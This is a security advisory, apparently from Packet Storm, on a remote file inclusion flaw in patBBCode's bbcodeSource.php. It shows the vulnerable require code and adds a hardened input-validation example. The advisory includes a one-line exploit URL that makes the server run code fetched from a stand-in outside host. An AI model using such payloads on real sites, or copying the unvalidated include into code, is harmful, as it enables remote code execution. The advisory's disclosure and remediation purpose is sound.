patbb-rfi.txt

๐Ÿ—“๏ธย 13 Nov 2007ย 00:00:00Reported byย p4sswdTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 15ย Views

Vulnerability in patExampleGen bbcodeSource.php file

Link to download: http://www.php-tools.net/site.php?file=patBBCode/overview.xml

Vuln file: `examples\patExampleGen\bbcodeSource.php`

Vuln code:

```php
if( !isset( $_GET['example'] ) )
    die( 'No example selected.' );

$exampleId = $_GET['example'];

ob_start();

// make the example think it's still in the right place
chdir( '../' );

// include the example
require $exampleId.'.php';

ob_end_clean();
```

Exploit:

`examples\patExampleGen\bbcodeSource.php?example= http://server.com/evilcode.php`
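A hardened counterpart to the `require $exampleId.'.php';` line above, as an added example that is not part of the advisory or of patBBCode. The helper name `resolveExample`, the temporary directory and the sample ids are constructed for illustration.

```php
<?php
// Added example, not patBBCode code. resolveExample() is a hypothetical helper.

/**
 * Map a user-supplied example id to a script inside $examplesDir.
 * Returns the canonical path, or null if the id must not be included.
 */
function resolveExample(string $examplesDir, $id): ?string
{
    // Arrays (?example[]=x) and any character outside this set are refused.
    // ':', '/', '\', '.' and NUL cannot pass, which excludes URL wrappers
    // (http://, ftp://, php://, data:) and directory traversal.
    if (!is_string($id) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $id)) {
        return null;
    }

    $base = realpath($examplesDir);
    if ($base === false) {
        return null;
    }

    // Defence in depth: canonicalise (resolves symlinks) and require a
    // regular file that sits directly in the examples directory.
    $path = realpath($base . DIRECTORY_SEPARATOR . $id . '.php');
    if ($path === false || !is_file($path) || dirname($path) !== $base) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary examples directory with one script.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'patbb_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'example_basic.php', '<?php echo "ok";');

$inputs = ['example_basic', 'http://server.com/evilcode', '../config', 'missing', ['x']];
foreach ($inputs as $id) {
    $label = is_array($id) ? '(array)' : $id;
    printf("%-28s %s\n", $label, resolveExample($dir, $id) === null ? 'rejected' : 'allowed');
}

unlink($dir . DIRECTORY_SEPARATOR . 'example_basic.php');
rmdir($dir);
```

In `bbcodeSource.php` the returned path would be what is passed to `require`, with a `die()` when the result is null. Setting `allow_url_include = Off` (the default since PHP 5.2.0) blocks the remote URL case but not inclusion of local files, so the input check is still needed.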
